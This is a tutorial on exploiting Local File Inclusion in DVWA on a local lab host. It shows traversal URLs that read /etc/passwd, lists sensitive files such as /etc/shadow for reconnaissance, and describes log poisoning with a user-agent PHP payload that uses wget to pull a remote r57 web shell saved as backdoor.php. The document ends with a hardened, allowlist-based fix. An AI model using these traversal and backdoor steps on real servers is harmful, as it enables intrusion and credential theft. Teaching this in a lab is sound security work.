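Local File Inclusion (LFI) is a vulnerability that lets an attacker inject directory traversal characters into a request to a website. It occurs when input is not sanitized. Here is sample code from a Damn Vulnerable Web Application (DVWA) page: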
<?php
$file = $_GET['page']; //The page we wish to display
?>
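Here is the vulnerable example link: http://127.0.0.1/vulnerabilities/fi/?page=include.php
Now let's try a directory traversal to read the web server's passwd file: http://127.0.0.1/vulnerabilities/fi/?page=/etc/passwd
Files that can be used for information gathering: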
/etc/environment
/etc/shadow
/etc/sudoers
/etc/group
/etc/resolv.conf
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
/var/log/messages
/var/log/mysql.log
/var/log/user.log
/var/www/logs/error_log
There are many ways to exploit a web server. An attacker can inject PHP code or a backdoor into the httpd logs and then access it again through the LFI:
/var/log/apache/error_log
/apache/logs/access.log
/var/log/error.log
Others may also use the Firefox User Agent Switcher add-on to spawn a shell:
<?exec('wget http://www.localroot.ph/r57.txt -O backdoor.php');?>
http://127.0.0.1/vulnerabilities/fi/?page=%2Fvar%2Flog%2Fmessages
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fresolv.conf
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fpasswd
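A hardened form of the `page` handling shown at the top, as an added example that is not DVWA's code: the request value is used only as a key into an allowlist, so neither `/etc/passwd` nor a log file can be reached through it. The `pages` directory, the allowlist entries and the function name `resolve_page` are assumptions.

```php
<?php
// Added example, not DVWA's code. PAGES_DIR and the allowlist entries are assumptions.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';   // assumed directory of includable pages
const ALLOWED_PAGES = [                 // assumed allowlist: request value => file name
    'include.php' => 'include.php',
    'file1.php'   => 'file1.php',
];

// Map the user-supplied page name to a file path, or null when it is not allowed.
function resolve_page(string $requested): ?string
{
    // 1. Allowlist lookup: user input is only a key, never part of a path.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    // 2. Defence in depth: canonicalise and confirm the file stays inside PAGES_DIR
    //    (catches a symlink or a bad allowlist entry pointing elsewhere).
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// ?page[]=x arrives as an array, so check the type before resolving.
$requested = $_GET['page'] ?? 'include.php';
$path = is_string($requested) ? resolve_page($requested) : null;

if ($path === null) {
    http_response_code(404);
    // JSON_HEX_TAG escapes < and >, and json_encode escapes newlines, so a rejected
    // value cannot place a PHP open tag or a forged line into the error log.
    error_log('fi: rejected page parameter: ' . json_encode($requested, JSON_HEX_TAG));
    exit('Page not found');
}
include $path;
```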